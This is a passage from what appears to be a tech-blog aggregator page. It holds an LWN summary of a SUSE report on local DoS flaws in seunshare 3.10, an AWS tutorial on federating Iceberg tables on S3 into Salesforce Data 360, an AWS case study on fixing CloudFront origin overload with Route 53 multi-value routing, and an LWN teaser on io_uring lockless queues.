Melody is a Principal Analytics Architect for Amazon EMR at AWS. She is an experienced analytics leader working with AWS customers to provide best practice guidance and technical advice in order to assist their success in data transformation. Her areas of interests are open-source frameworks and automation, data engineering and DataOps.

Vishal Vyas

Vishal Vyas

Vishal is a Principal Software Engineer for Amazon EMR, where he provides engineering leadership across all three Amazon EMR services: EMR on EC2, EMR on EKS, and EMR Serverless. With more than 17 years of industry experience, Vishal specializes in large-scale analytics, generative AI, and distributed systems. He leads the design and implementation of solutions for complex systems that span multiple AWS services and open-source technologies.

Avinash Desireddy

Avinash Desireddy

Avinash is a Specialist Solutions Architect (Containers) at Amazon Web Services (AWS), passionate about building secure applications and data platforms. He has extensive experience in Kubernetes, DevOps, and enterprise architecture, helping customers and partners containerize applications, streamline deployments, and optimize cloud-native environments.

Local DoS attack vectors in seunshare 3.10 (SUSE Security Team Blog)

Post Syndicated from jzb original https://lwn.net/Articles/1083076/

The SUSE Security Team Blog has a post
with an analysis of seunshare,
which is used by SELinux to confine untrusted programs. During a
review of version
3.10
of the program, the team identified two local
Denial-of-Service (DoS) vectors.

Since seunshare is supposed to run on SELinux-enabled systems, it
is important to understand what kind of privilege escalation can be
achieved when vulnerabilities are exploited in a setuid-root binary
like this. Many SELinux-enabled systems, such as Fedora and openSUSE,
ship with the “targeted” SELinux policy by default. This policy is
focused on confining well-known system services, but assigns an
unconfined SELinux context to interactive users by default to achieve
a balance between security and usability.

There is currently no domain transition from the unconfined domain
to the more restricted seunshare_t defined in the SELinux policy for
seunshare. This means the execution of seunshare continues in the
unconfined domain. Thus in the context of attacks carried out by
interactive users, the impact of the vulnerabilities below will be a
root-like privilege escalation despite the system running in SELinux
enforced mode.

See the post for the full write-up of the team’s discoveries and timeline. The
vulnerabilities have been fixed in version 3.11.

Zero Copy access to Apache Iceberg tables in Amazon S3 from Salesforce Data 360 using the Iceberg REST endpoint from AWS Glue Data Catalog

Post Syndicated from Avijit Goswami original https://aws.amazon.com/blogs/big-data/zero-copy-access-to-apache-iceberg-tables-in-amazon-s3-from-salesforce-data-360-using-the-iceberg-rest-endpoint-from-aws-glue-data-catalog/

Companies increasingly need to query and analyze data across platforms without the cost and complexity of moving it. Salesforce and AWS have collaborated to make this possible by providing Zero Copy access to Apache Iceberg tables stored in Amazon Simple Storage Service (Amazon S3) directly from Salesforce Data 360, using the Iceberg REST endpoint from AWS Glue Data Catalog with data access managed by AWS Lake Formation. This integration helps customers federate their Amazon S3 data lakes with Data 360, preserving data governance, freshness, and business semantics without replication.

Zero Copy file federation plays an important role in activating applications and experiences. By removing the need to physically move or copy data, and connecting to data at the storage level, it addresses key challenges including:

  • Cost efficiency – Reduce storage duplication costs and minimize the compute resources required for data pipelines.
  • High scale – Access data with near-native performance at scale through in-Region access.
  • Enhanced agility – Access and analyze data in real time, accelerating time-to-insight and supporting faster response to evolving business needs.
  • Streamlined operations – Remove the complexity of building and maintaining intricate data pipelines, clearing up valuable data engineering resources.

In this post, we demonstrate how AWS and Salesforce customers can access their enterprise data lakes on AWS from Data 360 using Zero Copy file federation.

What is Data 360?

Data 360 is the real-time data engine that activates trusted context across the entire Salesforce platform. It connects all your enterprise data — data warehouses, data lakes, third-party signals, and more — to the business context, logic, and governance that already live in Salesforce, without moving or copying it. With Zero Copy federation, your teams and AI agents always operate from a complete, current, and trusted picture of your business in the moment it’s needed. It serves as the essential system of context for Agentforce, enabling agents to reliably get real work done.

What is Apache Iceberg?

Apache Iceberg is a high-performance, open table format for huge analytic datasets that brings the reliability and simplicity of SQL tables to big data. It’s a thriving open source project under the Apache Software Foundation. Data engineers use Apache Iceberg because it’s fast, efficient, and reliable at any scale and keeps records of how datasets change over time. Apache Iceberg offers integrations with popular data processing frameworks such as Apache Spark, Apache Flink, Apache Hive, Presto, and more.

Why Amazon S3 for Apache Iceberg data lakes?

Amazon S3 is regarded as the best place to build data lakes because of its durability, availability, scalability, security, compliance, and audit capabilities, and its ability to integrate with a broad portfolio of AWS and third-party tools for data ingestion and processing. Apache Iceberg was designed and built to interact with Amazon S3, and provides support for many Amazon S3 features as listed in the Iceberg documentation.

What is Zero Copy file federation?

File federation, also termed catalog federation, uses the Data Catalog to communicate with remote catalog systems to discover catalog objects and to authorize access to their data in Amazon S3. When you query a remote Iceberg table, the Data Catalog discovers the latest table information in the remote catalog at query runtime, getting the table’s Amazon S3 location, current schema, and partition information. Your analytics engine then uses this information to access Iceberg data files directly from Amazon S3, and Lake Formation manages access to the table and data by vending scoped credentials to the table data stored in Amazon S3. This approach avoids metadata and data duplication while providing real-time access to remote Iceberg tables through your preferred AWS analytics engines.

Solution overview

Apache Iceberg file federation lets Data 360 directly query data stored in Amazon S3 without copying or moving the data. This Zero Copy approach provides several benefits:

  • Real-time access to Amazon S3 data from Salesforce.
  • Reduced data movement and storage costs.
  • Simplified data architecture.
  • Improved data freshness.

The following diagram illustrates the architecture of the integration between Data 360 and Amazon S3 using Apache Iceberg file federation.

Key components:

  1. Amazon S3 stores the source data in Apache Iceberg format.
  2. AWS Glue Data Catalog maintains the metadata for Iceberg tables.
  3. AWS Glue Iceberg REST endpoint provides RESTful access to Iceberg tables.
  4. AWS Lake Formation manages metadata and underlying data access for Amazon S3-based data lakes.
  5. Data 360 processes and analyzes the data.
  6. Apache Iceberg connector provides direct access to query Amazon S3 data from Salesforce.

Walkthrough

The following walkthrough shows you how to set up Zero Copy file federation.

Prerequisites

Before you begin, you need the following:

Configure your AWS environment

Set up an Amazon S3 bucket and Iceberg table

Sign in as the data lake admin and complete the following steps:

  1. Open the Amazon S3 console.
  2. Choose Create bucket to create a bucket.
  3. For Bucket type, choose General purpose, provide a Bucket name, and choose Create bucket.
  4. In the bucket, create two prefixes by choosing Create folder.
  5. Name the prefixes athena_iceberg and athena_results.
  6. Inside the athena_iceberg prefix, create another prefix named customer_iceberg.

Create an Iceberg table using Athena

  1. Open the Amazon Athena console.
  2. Choose Query your data in Athena console, then choose Launch query editor.
  3. In Athena, choose Edit settings.
  4. Set s3://<your-bucket-name>/athena_results/ as the Location of query result, then choose Save. Replace <your-bucket-name> with your bucket name.
  5. Choose Editor to return to the query editor page.
  6. To create the database, copy the following query into the query editor and choose Run. You need to be in the Athena Query Editor to run the following commands.
    create database iceberg_db;

  7. To create the Iceberg table, copy the following query into the query editor, replace <s3 bucket location> with your Amazon S3 bucket location hosting the Iceberg table, and choose Run.
    CREATE TABLE iceberg_db.churn (
        state string,
        account_length int,
        area_code string,
        phone string,
        intl_plan string,
        vmail_plan string,
        vmail_message int,
        day_mins double,
        day_calls int,
        day_charge double,
        eve_mins double,
        eve_calls int,
        eve_charge double,
        night_mins double,
        night_calls int,
        night_charge double,
        intl_mins double,
        intl_calls int,
        intl_charge double,
        custserv_calls int,
        churn boolean)
    LOCATION 's3://<s3 bucket location>/iceberg/churn'
    TBLPROPERTIES (
        'table_type'='iceberg',
        'compression_level'='3',
        'format'='PARQUET',
        'write_compression'='ZSTD'
    );

  8. Insert some records into the table.
    -- Sample data insert for "iceberg_db"."churn"
    -- Execute this in the Athena console
    INSERT INTO "iceberg_db"."churn" VALUES
    ('KS', 128, '415', '382-4657', 'no', 'yes', 25, 265.1, 110, 45.07, 197.4, 99, 16.78, 244.7, 91, 11.01, 10.0, 3, 2.70, 1, false),
    ('OH', 107, '415', '371-7191', 'no', 'yes', 26, 161.6, 123, 27.47, 195.5, 103, 16.62, 254.4, 103, 11.45, 13.7, 3, 3.70, 1, false),
    ('NJ', 137, '415', '358-1921', 'no', 'no', 0, 243.4, 114, 41.38, 121.2, 110, 10.30, 162.6, 104, 7.32, 12.2, 5, 3.29, 0, false),
    ('OH', 84, '408', '375-9999', 'yes', 'no', 0, 299.4, 71, 50.90, 61.9, 88, 5.26, 196.9, 89, 8.86, 6.6, 7, 1.78, 2, false),
    ('OK', 75, '415', '330-6626', 'yes', 'no', 0, 166.7, 113, 28.34, 148.3, 122, 12.61, 186.9, 121, 8.41, 10.1, 3, 2.73, 3, false),
    ('AL', 118, '510', '391-8027', 'yes', 'no', 0, 223.4, 98, 37.98, 220.6, 101, 18.75, 203.9, 118, 9.18, 6.3, 6, 1.70, 0, false),
    ('MA', 121, '510', '355-9993', 'no', 'yes', 24, 218.2, 88, 37.09, 348.5, 108, 29.62, 212.6, 118, 9.57, 7.5, 7, 2.03, 3, false),
    ('MO', 147, '415', '329-9001', 'yes', 'no', 0, 157.0, 79, 26.69, 103.1, 94, 8.76, 211.8, 96, 9.53, 7.1, 4, 1.92, 0, false),
    ('WV', 141, '415', '330-8173', 'yes', 'yes', 37, 258.6, 84, 43.96, 222.0, 111, 18.87, 326.4, 97, 14.69, 11.2, 5, 3.02, 0, false),
    ('IN', 65, '415', '329-6603', 'no', 'no', 0, 129.1, 137, 21.95, 228.5, 83, 19.42, 208.8, 111, 9.40, 12.7, 6, 3.43, 4, true),
    ('RI', 74, '415', '344-9230', 'no', 'no', 0, 187.7, 127, 31.91, 163.4, 148, 13.89, 196.0, 94, 8.82, 9.1, 5, 2.46, 0, false),
    ('IA', 168, '408', '363-1107', 'no', 'no', 0, 275.8, 90, 46.89, 230.0, 73, 19.55, 191.3, 57, 8.61, 9.9, 3, 2.67, 4, true),
    ('MT', 95, '510', '394-8006', 'no', 'no', 0, 113.2, 96, 19.24, 269.9, 107, 22.94, 229.1, 87, 10.31, 7.1, 4, 1.92, 1, false),
    ('NY', 62, '415', '371-5765', 'no', 'no', 0, 236.5, 127, 40.21, 145.3, 101, 12.35, 225.0, 103, 10.13, 12.0, 1, 3.24, 5, true),
    ('TX', 109, '408', '356-2992', 'no', 'yes', 33, 190.7, 114, 32.42, 218.2, 111, 18.55, 156.5, 122, 7.04, 11.6, 5, 3.13, 1, false),
    ('CA', 155, '510', '328-8230', 'no', 'no', 0, 197.3, 78, 33.54, 160.2, 86, 13.62, 280.1, 90, 12.60, 8.8, 2, 2.38, 2, false),
    ('WA', 132, '415', '382-1011', 'yes', 'no', 0, 302.7, 67, 51.46, 212.0, 105, 18.02, 265.5, 82, 11.95, 10.3, 4, 2.78, 3, true),
    ('FL', 88, '408', '344-5678', 'no', 'yes', 18, 145.3, 95, 24.70, 187.6, 92, 15.95, 198.2, 108, 8.92, 9.4, 3, 2.54, 0, false),
    ('CO', 201, '510', '367-4321', 'no', 'no', 0, 312.5, 142, 53.13, 178.9, 76, 15.21, 145.7, 95, 6.56, 14.2, 8, 3.83, 6, true),
    ('GA', 56, '415', '390-2244', 'no', 'yes', 12, 178.4, 101, 30.33, 205.1, 119, 17.43, 230.8, 100, 10.39, 8.0, 2, 2.16, 1, false);

Register the bucket with Lake Formation in Lake Formation mode

To use Lake Formation permissions for access control to the churn table, you must register the location. To do that, complete the following actions:

  1. Open the AWS Lake Formation console.
  2. In the navigation pane under Administration, choose Data lake locations.
  3. Choose Register location and enter the following information:
    1. For S3 URI, enter s3://<s3 bucket location>/iceberg/churn. Replace <s3 bucket location> with your Amazon S3 bucket location hosting the Iceberg table.
    2. For IAM role, choose the user-defined IAM role that you created in the prerequisites.
    3. For Permission mode, choose Lake Formation.
  4. Choose Register location.

Enable third-party integration in Lake Formation

From the Lake Formation console, enable full table access for external engines.

  1. Open the AWS Lake Formation console.
  2. On the left pane, expand the Administration section.
  3. Choose Application integration settings and select Allow external engines to access data in Amazon S3 locations with full table access.
  4. Choose Save.

Application integration settings page in the Lake Formation console with full table access enabled for external engines

Set up an IAM user for third-party access

  1. Open the IAM console.
  2. From the left navigation menu, choose Policies, then choose Create policy. Choose JSON and paste the following policy:
    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "VisualEditor0",
                "Effect": "Allow",
                "Action": "lakeformation:GetDataAccess",
                "Resource": "*"
            }
        ]
    }

  3. Choose next, provide a name for the policy, and choose Create policy.
  4. From the left navigation menu, choose Users, then choose Create user.
  5. For username, enter data_cloud_user, choose next, and choose Attach policies directly.
  6. Choose AWSGlueServiceRole and the policy that you created in step 3. Choose next and Create user.
  7. Choose the user, then choose Security credentials to create an access key.
  8. Scroll down and choose Create access key, choose Applications running outside AWS, and choose Create access key.
  9. Copy the access key and secret access key, and save them securely. You need these to configure the connector in Data 360.

Set up Lake Formation resource permissions for third-party data access

  1. Open the Lake Formation console.
  2. From the left navigation under Data Catalog, choose Databases, then choose the athena_iceberg_db database.
  3. From the Actions menu, choose Permissions, Grant.
  4. In Principals, choose IAM users and roles, and from the menu choose data_cloud_user, which you just created in IAM.
  5. Scroll down to grant permissions by choosing All tables, then choose Select and Describe permissions for the tables.
  6. Choose Grant to apply the permissions.

Set up Apache Iceberg file federation in Data 360

Create and configure the connection

  1. Navigate to Salesforce Setup. For instructions, see Set Up the AWS Glue Data Catalog Connection.
  2. In Data Cloud, choose Setup, then choose Data Cloud Setup.
    Data Cloud Setup page in Salesforce showing options to configure connections
  3. Under External Integrations, choose Other Connectors.
  4. Choose New.
  5. On the Source tab, choose AWS Glue Data Catalog, then choose Next.
    New connector page in Salesforce Data Cloud with AWS Glue Data Catalog selected as the source
  6. Complete the following information shown in the following screen:
    1. In the Authentication Details section, enter the AWS access key ID and AWS secret access key for the IAM user. Make sure that the IAM user has a policy that grants the user read-only access to AWS Glue Data Catalog. Use Lake Formation to configure storage credential vending. This approach is for AWS Glue Data Catalog to vend temporary credentials at run time so that Data 360 can access the underlying storage bucket.
    2. For Catalog URL, enter the URL of AWS Glue Data Catalog. See Connecting to the Data Catalog by using AWS Glue Iceberg REST endpoint.
    3. For Catalog ID, enter the 12-digit AWS account ID linked to AWS Glue Data Catalog.
    4. For Signing Region, enter the host AWS Region where AWS Glue Data Catalog is located.
    5. For Signing Service, enter glue. Data 360 requires the Signing Service, in addition to the AWS access key ID, secret access key, and Signing Region, to sign requests to AWS Glue Data Catalog by using AWS Signature Version 4.
    6. Test the connection and check for the success message.
    7. Save the connection details.

    AWS Glue Data Catalog connection configuration form in Salesforce Data Cloud showing authentication details, catalog URL, catalog ID, signing Region, and signing service fields

  7. After the configuration is complete and saved, the new AWS Glue Data Catalog connection shows up with “Active” status in the Connectors screen.Connectors screen in Salesforce Data Cloud showing the new AWS Glue Data Catalog connection with Active status

Create and configure the data stream

  1. In Data Cloud, on the Data Streams tab, choose New.
  2. Under Other Sources, choose the AWS Glue Data Catalog source, then choose Next.
  3. From the menus, choose the connection that you just set up, choose a database in your AWS Glue catalog where you have an Iceberg table, choose the table that you want to stream, and choose Next.Data stream configuration page showing AWS Glue Data Catalog source with connection, database, and Iceberg table selection menus
  4. Enter the object name and object API name. For more information, see Data Lake Object Naming Standards.
  5. Choose the category to specify the type of data to ingest. For more information, see Category.
  6. Choose a primary key to uniquely identify the incoming records. For more information, see Primary Key.
  7. Choose the source fields you want to ingest, then choose Next. Fields with convertible data types are listed under Supported Fields.Source fields selection page showing supported fields for the Iceberg table data stream
  8. Choose the relevant data space. Choose “Default” if you don’t have any other data space provisioned in your org. For more information, see Data Spaces.
  9. Choose Deploy.
    Data stream deployment confirmation page in Salesforce Data Cloud
  10. After the setup is complete, the new data stream appears in your Data Cloud environment.
    Data Cloud environment showing the newly deployed data stream for the Iceberg table
  11. The data stream is ready. You can now go to the Data Explorer in your Data Cloud environment and start viewing the Iceberg tables that reside in your external AWS account.Data Explorer in Salesforce Data Cloud showing Iceberg tables from the external AWS account

Best practices and considerations

  • Use IAM roles with least-privilege access. Grant only the specific permissions each service or user needs.
  • Implement appropriate Amazon S3 bucket policies. Define bucket-level policies that restrict access by AWS account, VPC endpoint, or IP range.
  • Monitor access patterns. Enable Amazon S3 server access logging or AWS CloudTrail data events to track who reads from and writes to your table buckets.
  • Optimize Iceberg table partitioning. Choose partition keys that align with your most common query filters.
  • Consider data access patterns. Design your table layout around how data is actually queried.
  • Implement lifecycle policies for Amazon S3 objects. Configure Amazon S3 lifecycle rules to transition older data files to other storage classes.
  • Use appropriate Iceberg file compaction strategies. Run compaction regularly to merge small files produced by streaming or frequent batch appends.
  • Monitor data transfer costs. Track cross-Region and internet egress charges using AWS Cost Explorer as applicable.

Clean up

After you finish testing, clean up all the resources in your AWS account that you created (including the Amazon S3 bucket, Athena tables, and other AWS services) to avoid recurring costs.

Conclusion

By implementing Apache Iceberg file federation between Data 360 and Amazon S3, you can create a more efficient and streamlined data architecture. This solution gives you real-time access to Amazon S3 data while using the analytics capabilities of Data 360. As businesses continue to prioritize data-driven decision-making, Zero Copy data sharing plays an important role in unlocking the full potential of customer data across platforms.

To learn more, review the following resources:


About the authors

Avijit Goswami

Avijit Goswami

Avijit is a principal specialist solutions architect at AWS specializing in data and analytics. He helps customers design and implement robust data lake solutions. Outside the office, you can find Avijit exploring new trails, discovering new destinations, cheering on his favorite teams, enjoying music, or testing out new recipes in the kitchen.

Srividya Parthasarathy

Srividya Parthasarathy

Srividya is a Senior Big Data Architect on the AWS Lake Formation team. She works with the product team and customers to build robust features and solutions for their analytical data platform. She enjoys building data mesh solutions and sharing them with the community.

Pratik Das

Pratik Das

Pratik is a Senior Product Manager with AWS Lake Formation. He is passionate about all things data and works with customers to understand their requirements and build delightful experiences. He has a background in building data-driven solutions and machine learning systems

Bill Tarr

Bill Tarr

From software builder to architecture, Bill has 20+ years of experience shaping best-in-class SaaS technology strategies for organizations from startup to enterprise. He’s also an AWS SaaS community leader and a producer of the “Building SaaS on AWS” show on twitch.com/aws, as well as an experienced public speaker with experience at top tier AWS events such as re:Invent, and publisher of SaaS best practices.

How bitdrift scaled to 121 million concurrent gRPC connections on Amazon CloudFront for live telemetry sporting events

Post Syndicated from Raghuram Gururajan original https://aws.amazon.com/blogs/architecture/how-bitdrift-scaled-to-121-million-concurrent-grpc-connections-on-amazon-cloudfront-for-live-telemetry-sporting-events/

When 121 million mobile devices establish persistent gRPC connections to your origin infrastructure within seconds of a live broadcast, the routing policy behind your DNS records matters far more than it does at normal traffic levels. The wrong policy can concentrate all your connections onto a single origin endpoint, turning a scaling success into an outage. bitdrift, a mobile observability platform founded by former Lyft infrastructure engineers, learned this firsthand while delivering real-time telemetry for a major customer during the T20 World Cup cricket series. As matches kicked off, Amazon CloudFront absorbed traffic surging from near-zero to 110K+ peak requests per second.

bitdrift and the AWS account team diagnosed a connection concentration pattern under production pressure. The fix was a single DNS concentration change: migrating from weighted to multi-value answer routing. This change made bitdrift’s multi-Network Load Balancer (NLB’s) architecture distribute load, and they served 121 million devices with zero server-side errors.

bitdrift is a mobile observability platform (founded by ex-Lyft engineers) whose lightweight Capture performance-centric SDK provides real-time telemetry from millions of mobile devices. When bitdrift onboarded a major customer whose app serves live T20 World Cup cricket matches, they hit a scaling problem they hadn’t seen before: traffic surging from near-zero to tens of millions of concurrent gRPC connections within seconds of match start.

The DNS resolution imbalance

During early events in late February 2026, bitdrift experienced errors between CloudFront and their NLB origins under peak load. The AWS account team (SA, AM, TAM, CloudFront service team, and Amazon Route 53 specialists) identified the root cause: Route 53 Weighted routing was returning a single IP per DNS response. This caused all CloudFront cache hosts to resolve to the same origin for the duration of the TTL, creating a thundering herd effect that overwhelmed individual NLBs.

The TTL-driven traffic concentration

When you use weighted routing in Route 53, each DNS query returns a single IP address. At CloudFront’s scale, this means all edge nodes resolve your origin to the same load balancer for the duration of the DNS TTL. This creates a concentration effect where one NLB absorbs all traffic until the TTL expires and a new resolution occurs. Even after the customer scaled from 2 to 6 NLB IPs, the problem persisted because weighted routing returned a single IP per response. All CloudFront edge nodes resolved to the same origin for the duration of the TTL, making it appear that adding more origins had no effect.

Why persistent connections amplify this problem

Unlike short-lived HTTP requests, gRPC connections are long-lived and accumulate on whichever origin was resolved at connection time. This meant that a DNS configuration producing mild unevenness with stateless traffic caused catastrophic overload with persistent connections. Even after the customer scaled from 2 to 6 NLB IPs, the problem persisted. Weighted routing returned a single IP per response, and all CloudFront edge nodes resolved to the same origin for the duration of the TTL. This made it appear that adding more origins had no effect.

Architecture diagram

The following diagram shows the end-to-end architecture, from CloudFront edge nodes through Route 53 to the multi-region NLB fleet.

Figure 1. Amazon Route 53 is the origin-facing DNS routing layer between CloudFront and the multi-AZ Network Load Balancer (NLB) fleet. When CloudFront edge nodes need to reach the origin, they resolve the origin domain through Route 53, which directs traffic to the appropriate NLB across AZ-1, AZ-2, and AZ-3. Each NLB then forwards connections to its corresponding Amazon Elastic Kubernetes Service (Amazon EKS) workloads running within a virtual private cloud (VPC). Under Weighted routing, Route 53 returns only a single IP per DNS query, causing all edge nodes to converge on one NLB per TTL window, creating the thundering herd effect.

The fix: multi-value answer routing

Multi-Value Answer routing returns up to 8 IP addresses per DNS query, with built-in health checks per record. CloudFront edge nodes can immediately spread connections across multiple origins from the first DNS resolution, eliminating the single-origin bottleneck.

The customer-side change was straightforward:

  • bitdrift switched from Weighted to Multi-Value Answer routing, which returns up to 8 IPs per DNS response with built-in health checks spreading origin connections across multiple NLBs immediately.

The customer didn’t need to change any code or redesign their architecture. A DNS configuration update was all it took to handle 121 million concurrent devices with zero errors.

Graph showing traffic patterns during the T20 World Cup cricket series

Before vs. after comparison

Aspect Before (Weighted Routing) After (Multi-Value Routing)
IPs returned per DNS query 1 8
Origin load distribution All traffic to single NLB per TTL window Traffic spread across multiple NLBs immediately
Behavior under surge Thundering herd single NLB overwhelmed Even distribution no single point of overload
Errors at peak load Origin errors between CloudFront and NLB Zero server-side errors
Customer-side change required — DNS configuration update only

Results and key metrics

Before the fix, CloudFront cache hosts resolved the origin domain to a single NLB IP per DNS TTL window (60 seconds). During traffic surges, this funneled all origin connections through a single load balancer, overwhelming its capacity.

On the February 27th event (14 million concurrent connections), approximately 80% of requests failed with HTTP 500 errors. The issue recurred on March 1st despite scaling to 4 NLB IPs. Weighted routing still returned only one IP per DNS response, so adding more origins had no effect until the routing policy was changed.

After switching to Multi-Value Answer routing on March 4th, CloudFront cache hosts immediately began resolving all 6 origin IPs simultaneously. During the next peak event, there were zero origin connection errors. By the final match on March 8th, bitdrift handled 121 million unique devices and 110K+ peak requests per second with zero server-side errors.

Key metrics

  • 121M unique devices during a single live sporting event.
  • 110K+ peak requests per second.
  • 100x traffic surge handled (near-zero to peak in seconds).
  • Zero server-side errors.
  • Minimal customer change: DNS configuration update only.

Performance before vs. after

Performance comparison chart showing error rates before and after switching to multi-value answer routing

Improvement summary

Metric Before (Mar 1–2) After (Mar 7–9) Improvement
Peak 5xx Error Rate 79.80% 0.033% 99.96% reduction (2,418× better)
Avg 5xx Error Rate 1.87% 0.003% 99.84% reduction (623× better)
Peak 5-min Requests 169M 49.3M Different event scale
Peak Requests/sec 563K 164K Different event scale
Avg 4xx Error Rate 0.014% 0.007% 50% reduction
Server-Side Outages Multiple origin failures Zero 100% elimination
Unique Devices (Mar 8) 121 million 121 million Zero server-side errors

Technical walk-through

To switch your Route 53 origin records from weighted routing to multi-value answer routing, follow these steps. If you’re using CloudFront with multiple origin load balancers, this configuration ensures traffic is distributed evenly across all of them from the first request.

Prerequisites

Before you begin, make sure you have:

  • An AWS account with access to Route 53 and CloudFront.
  • A hosted zone in Route 53 for your domain.
  • Two or more NLB’s serving as CloudFront origins.
  • A CloudFront distribution configured with your origin domain.
  • AWS Command Line Interface (AWS CLI) installed (optional, for CLI steps).

Step 1: Identify your current origin records

First, check what records currently exist for your origin domain.

In the console:

  1. Open the Route 53 console.
  2. Choose Hosted zones in the left navigation.
  3. Select your hosted zone (for example, origin.example.com).
  4. Find the records for your origin domain (for example, origin.example.com).
  5. Note the routing policy. If it says Weighted, this guide applies to you.

Using the CLI:

aws route53 list-resource-record-sets \
  --hosted-zone-id Z1234567890ABC \
  --query "ResourceRecordSets[?Name=='origin.example.com.']"

You’ll see something like:

[
  {
    "Name": "origin.example.com.",
    "Type": "A",
    "SetIdentifier": "nlb-1",
    "Weight": 50,
    "AliasTarget": {
      "DNSName": "nlb-1-abcdef.elb.us-east-1.amazonaws.com.",
      "HostedZoneId": "Z26RNL4JYFTOTI",
      "EvaluateTargetHealth": true
    }
  },
  {
    "Name": "origin.example.com.",
    "Type": "A",
    "SetIdentifier": "nlb-2",
    "Weight": 50,
    "AliasTarget": {
      "DNSName": "nlb-2-ghijkl.elb.us-east-1.amazonaws.com.",
      "HostedZoneId": "Z26RNL4JYFTOTI",
      "EvaluateTargetHealth": true
    }
  }
]

Step 2: Create health checks for each origin

Multi-Value Answer routing requires a health check attached to each record. The main advantage here is that unhealthy origins are automatically removed from the DNS responses.

In the console:

  1. In Route 53, choose Health checks in the left navigation.
  2. Choose Create health check.
  3. Configure:
  • Name: nlb-1-health-check.
  • What to monitor: Endpoint.
  • Specify endpoint by: Domain name.
  • Protocol: TCP (or HTTP/HTTPS if your origin supports it).
  • Domain name: nlb-1-abcdef.elb.us-east-1.amazonaws.com.
  • Port: Your origin port (for example, 443).
  • Request interval: 10 seconds (Fast) recommended for burst traffic patterns.
  • Failure threshold: 3.
  1. Choose Create health check.
  2. Repeat for each NLB.

Using the CLI:

aws route53 create-health-check \
  --caller-reference "nlb-1-health-$(date +%s)" \
  --health-check-config '{
    "Type": "TCP",
    "FullyQualifiedDomainName": "nlb-1-abcdef.elb.us-east-1.amazonaws.com",
    "Port": 443,
    "RequestInterval": 10,
    "FailureThreshold": 3
  }'

Step 3: Create multi-value answer records

Note: Multi-Value Answer routing requires IP address records, not Alias records. Assign Elastic IP addresses to each NLB Availability Zone before proceeding — Application Load Balancers are not compatible with this pattern because they do not support static IP addresses.

Now create the new records with Multi-Value Answer routing.

In the console:

  1. Choose Create record.
  2. Configure:
  • Record name: origin (or your subdomain)
  • Record type: A.
  • Routing policy: Multi-Value Answer.
  • Value/Route traffic to: Enter the IP address of your first NLB (or use the NLB’s static IP).
  • Health check: Select the health check you created for this NLB.
  • Record ID: nlb-1 (a unique ID for this record)
  • TTL: 60 seconds (keep it low for faster failover).
  1. Choose Create records.
  2. Repeat for each NLB.

Using the CLI:

aws route53 change-resource-record-sets \
  --hosted-zone-id Z1234567890ABC \
  --change-batch '{
    "Changes": [
      {
        "Action": "CREATE",
        "ResourceRecordSet": {
          "Name": "origin.example.com.",
          "Type": "A",
          "SetIdentifier": "nlb-1",
          "MultiValueAnswer": true,
          "TTL": 60,
          "ResourceRecords": [{"Value": "10.0.1.100"}],
          "HealthCheckId": "abcd1234-5678-90ab-cdef-EXAMPLE1"
        }
      },
      {
        "Action": "CREATE",
        "ResourceRecordSet": {
          "Name": "origin.example.com.",
          "Type": "A",
          "SetIdentifier": "nlb-2",
          "MultiValueAnswer": true,
          "TTL": 60,
          "ResourceRecords": [{"Value": "10.0.2.100"}],
          "HealthCheckId": "abcd1234-5678-90ab-cdef-EXAMPLE2"
        }
      }
    ]
  }'

Step 4: Delete the old weighted records

Once you’ve verified the Multi-Value Answer records are returning correctly (Step 5), delete the original Weighted routing records. Route 53 does not allow mixed routing policies for the same record name. The old Weighted records must be removed.

Step 5: Verify the configuration

dig origin.example.com +short

You should see multiple IPs returned simultaneously:

10.0.1.100
10.0.2.100
10.0.3.100

Summary of challenges

Resolving the issue under production pressure presented several challenges:

  • Diagnosing under fire: The initial outage occurred during a live T20 World Cup match with 14 million concurrent connections. Root cause analysis had to happen in real-time while the customer’s production traffic was failing.
  • Persistent connections amplify DNS routing issues: Unlike short-lived HTTP requests, gRPC connections are long-lived and accumulate on whichever origin was resolved at connection time. This meant that a DNS configuration producing mild unevenness with stateless traffic caused catastrophic overload with persistent connections.
  • DNS caching obscured the real bottleneck: Even after the customer scaled from 2 to 6 NLB IPs, the problem persisted. Because Weighted routing returned a single IP per response, all CloudFront edge nodes resolved to the same origin for the duration of the TTL. This made it appear that adding more origins had no effect.
  • Customer coordination under time pressure: The customer was initially reluctant to change their Route 53 configuration ahead of the next match. Working with the AWS account team to build confidence in the DNS change while a live event was days away required clear communication of the root cause and expected impact.

Conclusion

This case demonstrates that at extreme scale, infrastructure decisions that seem routine can become the difference between a flawless event and a production outage. Choosing a DNS routing policy is one such decision. bitdrift’s architecture was sound: CloudFront at the edge, NLBs at the origin, gRPC for efficient persistent connections. But Weighted routing’s single-IP-per-response behavior created a thundering herd that no amount of origin scaling could overcome.

The fix was purely configuration: switching from weighted to multi-value answer routing in Route 53. After that change, bitdrift handled 121 million concurrent devices with zero errors.

If you’re running CloudFront with multiple origin load balancers, especially with persistent connection protocols like gRPC or WebSocket, review your Route 53 routing policy. Multi-Value Answer routing ensures that CloudFront edge nodes distribute origin connections across all available endpoints from the first DNS resolution. This eliminates the single-origin bottleneck that Weighted routing can create under surge conditions.

For pre-event capacity planning or to discuss your architecture with an AWS specialist, contact your AWS account team or reach out through AWS Support.

Key takeaways

  1. DNS routing policy selection matters at extreme scale. Weighted vs. Multi-Value Answer has significant implications for origin load distribution behind CloudFront.
  2. Persistent connections (gRPC, WebSocket) amplify DNS routing problems. Unlike stateless HTTP where connections are short-lived, persistent connections accumulate on whichever origin was resolved at connection time. A DNS misconfiguration that causes mild unevenness with HTTP traffic can cause catastrophic overload with persistent connections.
  3. Engaging AWS service teams early for pre-event capacity reviews prevents day-of failures.
  4. A DNS configuration change can improve scale without requiring any architectural changes.

About the authors

[$] Lockless MPSC FIFO queues for io_uring

Post Syndicated from corbet original https://lwn.net/Articles/1081871/

Processes that use io_uring
tend to keep a lot of balls in the air; being able to have many operations
underway at any given time is part of the point of that API in the first
place. The io_uring subsystem must, as a result, keep track of a lot of
tasks that have to be performed at the right time. In current kernels,
io_uring uses a standard kernel linked-list primitive to track those work
items. As of the 7.2 kernel release, though, io_uring will, instead, use a
new lockless, multi-producer, single-consumer (MPSC) queue, resulting in
some notable performance gains. Lockless algorithms tend to be tricky, but
the one used here is relatively approachable and shows how these algorithms
can work.

The collective thoughts of the interwebz